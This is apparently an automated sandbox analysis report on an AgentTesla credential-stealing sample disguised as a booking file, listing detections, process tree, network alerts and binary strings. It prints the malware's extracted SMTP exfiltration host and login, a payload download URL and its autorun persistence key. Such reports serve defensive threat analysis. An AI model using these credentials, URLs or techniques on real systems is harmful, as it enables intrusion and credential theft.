Edit tour

Windows Analysis Report
Booking_0106.exe

Overview

General Information

Sample name:	Booking_0106.exe
Analysis ID:	1526562
MD5:	219bc0b3320f5f73d684f07800c0134d
SHA1:	867abe30a0018c0c902f11a9edfb7c0262cdedf5
SHA256:	4d7489c7f5c86e43100b25314f49f3577d43ae47e090b0916578da82ec3d59e6
Tags:	AgentTeslaBookingexeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Booking_0106.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Booking_0106.exe" MD5: 219BC0B3320F5F73D684F07800C0134D)

doc-d.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\doc-d.exe" MD5: C9EF77CA68F77B6C1267A7314203C94B)

WerFault.exe (PID: 7352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1736 MD5: C31336C1EFC2CCB44B4326EA793040F2)

Booking_0106.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\Booking_0106.exe" MD5: 219BC0B3320F5F73D684F07800C0134D)

ibrzb.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Roaming\ibrzb.exe" MD5: 219BC0B3320F5F73D684F07800C0134D)

ibrzb.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Roaming\ibrzb.exe" MD5: 219BC0B3320F5F73D684F07800C0134D)

ibrzb.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Roaming\ibrzb.exe" MD5: 219BC0B3320F5F73D684F07800C0134D)

ibrzb.exe (PID: 6096 cmdline: "C:\Users\user\AppData\Roaming\ibrzb.exe" MD5: 219BC0B3320F5F73D684F07800C0134D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2962339297.000000000306C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2962339297.0000000003074000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2962867895.0000000003117000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2963837882.00000000029AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1731841032.0000000005960000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2962867895.000000000312A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2962339297.000000000307A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2963837882.00000000029BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Booking_0106.exe PID: 7532	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Booking_0106.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Booking_0106.exe PID: 7532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Booking_0106.exe PID: 7532	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Booking_0106.exe PID: 7628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Booking_0106.exe PID: 7628	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ibrzb.exe PID: 7880	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: ibrzb.exe PID: 7880	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ibrzb.exe PID: 7880	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ibrzb.exe PID: 7880	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ibrzb.exe PID: 7924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ibrzb.exe PID: 7924	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ibrzb.exe PID: 7276	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: ibrzb.exe PID: 7276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ibrzb.exe PID: 7276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ibrzb.exe PID: 7276	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ibrzb.exe PID: 6096	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ibrzb.exe PID: 6096	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Booking_0106.exe.5960000.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Booking_0106.exe.4023d90.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Booking_0106.exe.4023d90.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Booking_0106.exe.4023d90.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Booking_0106.exe.4023d90.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Booking_0106.exe.4023d90.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Booking_0106.exe.4023d90.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ibrzb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Booking_0106.exe, ProcessId: 7532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ibrzb

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Booking_0106.exe, Initiated: true, ProcessId: 7628, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T10:41:05.744776+0200	2030171	1	A Network Trojan was detected	192.168.2.4	49744	162.254.34.31	587	TCP
2024-10-06T10:41:05.744776+0200	2030171	1	A Network Trojan was detected	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:43:00.505463+0200	2030171	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T10:41:09.676370+0200	2855542	1	A Network Trojan was detected	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:41:21.884305+0200	2855542	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP
2024-10-06T10:41:30.310112+0200	2855542	1	A Network Trojan was detected	192.168.2.4	49744	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T10:41:09.676370+0200	2855245	1	A Network Trojan was detected	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:41:21.884305+0200	2855245	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP
2024-10-06T10:41:30.310112+0200	2855245	1	A Network Trojan was detected	192.168.2.4	49744	162.254.34.31	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T10:41:05.744776+0200	2840032	1	A Network Trojan was detected	192.168.2.4	49744	162.254.34.31	587	TCP
2024-10-06T10:41:05.744776+0200	2840032	1	A Network Trojan was detected	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:43:00.505463+0200	2840032	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe

Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Found malware configuration

Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Multi AV Scanner detection for domain / URL

Source: http://172.86.66.70/3y/doci.exe	Virustotal: Detection: 9%	Perma Link
Source: http://172.86.66.70	Virustotal: Detection: 5%	Perma Link
Source: http://172.86.66.70/3y/doci.exeP	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Virustotal: Detection: 47%	Perma Link
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Virustotal: Detection: 66%	Perma Link

Multi AV Scanner detection for submitted file

Source: Booking_0106.exe	ReversingLabs: Detection: 60%
Source: Booking_0106.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Booking_0106.exe

Joe Sandbox ML: detected

Source: Booking_0106.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: Booking_0106.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.pdb` source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1732460118.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003E89000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003C23000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003963000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbK source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbc source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb8 source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1732460118.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003E89000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003C23000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003963000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000894000.00000004.00000020.00020000.00000000.sdmp, doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp, WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\dll\System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: protobuf-net.pdb source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: m0C:\Windows\mscorlib.pdb source: doc-d.exe, 00000001.00000002.2268824999.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: C:\Windows\System.Net.Http.pdbpdbttp.pdb" source: doc-d.exe, 00000001.00000002.2269121553.0000000000810000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: doc-d.exe, 00000001.00000002.2268824999.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000894000.00000004.00000020.00020000.00000000.sdmp, WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbJw source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: ~p.pdbk$ source: doc-d.exe, 00000001.00000002.2269121553.0000000000810000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\doc-d.PDB source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbK source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbF source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\doc-d.PDB source: doc-d.exe, 00000001.00000002.2268824999.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdbI source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_059FD838
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A23BC1h	0_2_05A23D27
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A23BC1h	0_2_05A23B84
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A23BC1h	0_2_05A23A88
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_05A22AC8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_05A22AD0
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A23BC1h	0_2_05A23A7A
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A364BAh	0_2_05A36428
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A364BAh	0_2_05A36438
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A35C65h	0_2_05A358B8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A35C65h	0_2_05A358C8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A3E0C8h	0_2_05A3E009
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 4x nop then jmp 05A3E0C8h	0_2_05A3E010
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_0571D838
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05743BC1h	3_2_05743D27
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05743BC1h	3_2_05743B84
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05743BC1h	3_2_05743A7F
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	3_2_05742AD0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	3_2_05742AC8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05743BC1h	3_2_05743A88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 057564BAh	3_2_05756438
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 057564BAh	3_2_05756428
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 0575E0C8h	3_2_0575E010
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 0575E0C8h	3_2_0575E009
